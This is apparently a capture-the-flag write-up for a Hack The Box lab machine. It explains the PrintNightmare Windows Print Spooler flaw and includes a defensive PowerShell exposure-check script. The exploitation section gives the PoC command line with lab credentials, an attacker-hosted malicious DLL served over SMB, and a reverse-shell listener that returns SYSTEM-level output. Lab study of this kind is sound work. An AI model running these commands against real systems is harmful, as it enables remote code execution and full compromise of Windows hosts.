CVE-2021-1675(PrintNightmare)


A vulnerability has been found in Microsoft Windows (Operating System) and classified as critical. This vulnerability affects the function RpcAddPrinterDriverEx of the file spoolsv.exe of the component Print Spooler Service. The manipulation of the argument dwFileCopyFlags with an unknown input leads to an access control vulnerability. The CWE definition for the vulnerability is CWE-284: the product does not restrict, or incorrectly restricts, access to a resource from an unauthorized actor. The impact is known to affect confidentiality, integrity, and availability.

CVE-2021-34527 is the remote variant of CVE-2021-1675. It is reached over MS-RPRN and MS-PAR via MSRPC, and it works by exploiting a logic flaw in the MS-RPRN protocol's RpcAddPrinterDriverEx function.

There is also another path through the MS-PAR protocol's RpcAsyncAddPrinterDriver function. It is similar to RpcAddPrinterDriverEx but has far fewer constraints and is not limited to domain controllers or to Windows 10 systems with non-default settings.

Overview of CVE-2021-1675/CVE-2021-34527

Testing


PS C:\tmp> Get-Service Spooler
 
Status   Name               DisplayName                           
------   ----               -----------                           
Running  Spooler            Print Spooler

The vulnerability takes advantage of the Windows-native Print Spooler service, which is enabled by default on all Windows machines (servers and endpoints). The target system gave away that it was running a spoolsv process, and there was no sign that a patch for it had been installed.

On top of that, I already knew the spooler service was running from enumerating the MSRPC server earlier.
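The exposure this section relies on, a running Spooler with default Point and Print behaviour and a reachable remote RPC endpoint, is something a defender can check for from the host side. The following PowerShell script is an added example, not code from the original writeup or from the PoC tool; the registry paths and value names are the ones Microsoft's CVE-2021-34527 mitigation guidance refers to, and the script assumes it is run elevated on the Windows host being assessed.

```powershell
# Added example: PrintNightmare (CVE-2021-1675 / CVE-2021-34527) exposure check.
# Reports conditions that leave the host exploitable; an empty report means none
# of the checked conditions is present (it does not prove the host is patched).

$printersKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
$ppKey       = "$printersKey\PointAndPrint"
$findings    = @()

function Get-RegValue {
    param([string]$Path, [string]$Name)
    # $null when the key or value is absent, i.e. the OS default applies
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

# 1. Service state: a stopped and disabled Spooler removes the attack surface entirely.
$svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
if ($null -eq $svc) {
    $findings += 'Spooler service not found (host may not have the Print Spooler component)'
} elseif ($svc.Status -eq 'Running') {
    $findings += "Spooler is running (StartType: $($svc.StartType))"
}

# 2. Remote variant (CVE-2021-34527): the spooler only exposes its RPC interface to
#    remote clients when it registers the remote endpoint. Policy value 2 disables it.
$rpc = Get-RegValue -Path $printersKey -Name 'RegisterSpoolerRemoteRpcEndPoint'
if ($rpc -ne 2) {
    $findings += "Spooler accepts remote RPC connections (RegisterSpoolerRemoteRpcEndPoint=$rpc)"
}

# 3. Point and Print hardening. A non-zero NoWarningNoElevationOnInstall or
#    UpdatePromptSettings re-opens the driver-install behaviour the fix closed, and an
#    explicit RestrictDriverInstallationToAdministrators=0 lets non-admins install drivers.
$noWarn   = Get-RegValue -Path $ppKey -Name 'NoWarningNoElevationOnInstall'
$update   = Get-RegValue -Path $ppKey -Name 'UpdatePromptSettings'
$restrict = Get-RegValue -Path $ppKey -Name 'RestrictDriverInstallationToAdministrators'
if ($noWarn)               { $findings += "NoWarningNoElevationOnInstall=$noWarn (should be 0 or absent)" }
if ($update)               { $findings += "UpdatePromptSettings=$update (should be 0 or absent)" }
if ($restrict -eq 0)       { $findings += 'RestrictDriverInstallationToAdministrators=0 (non-admin driver installs allowed)' }

# 4. Report.
if ($findings.Count -eq 0) {
    Write-Output 'No PrintNightmare exposure conditions found by this check.'
} else {
    Write-Output 'PrintNightmare exposure conditions:'
    $findings | ForEach-Object { Write-Output "  - $_" }
}
```

Pair the output with the host's installed-update list against Microsoft's advisory for CVE-2021-34527, since a running Spooler on a fully patched host with hardened Point and Print settings is not the condition this writeup exploits.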

Exploit (PrintNightmare)


There is this tool, which has a built-in SMB server to host the DLL payload, which makes it handier.

Exploitation


┌──(kali㉿kali)-[~/…/htb/labs/atom/CVE-2021-34527]
└─$ python3 CVE-2021-34527.py $IP -u jason -p 'kidvscat_electron_@123' --local-auth -proto MS-RPRN -dll printnightmare.dll --local-ip 10.10.14.23 -share smb       
[*] starting PrintNightmare PoC
[+] Self-hosted payload at \\10.10.14.23\smb\printnightmare.dll
 
[*] Attempting target: 10.10.10.237
[*] Connecting to ncacn_np:10.10.10.237[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\WINDOWS\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\10.10.14.23\smb\printnightmare.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[-] Exploit returned: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)
[*] Closing SMB Server

Executing

┌──(kali㉿kali)-[~/archive/htb/labs/atom]
└─$ nnc 1234       
listening on [any] 1234 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.237] 63434
Windows PowerShell running as user ATOM$ on ATOM
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\WINDOWS\system32> whoami
nt authority\system
PS C:\WINDOWS\system32> hostname
ATOM
PS C:\WINDOWS\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::a113:8872:d58a:1862
   Temporary IPv6 Address. . . . . . : dead:beef::c8c5:32a:bb32:10b9
   Link-local IPv6 Address . . . . . : fe80::a113:8872:d58a:1862%6
   IPv4 Address. . . . . . . . . . . : 10.10.10.237
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%6
                                       10.10.10.2

System Level Compromise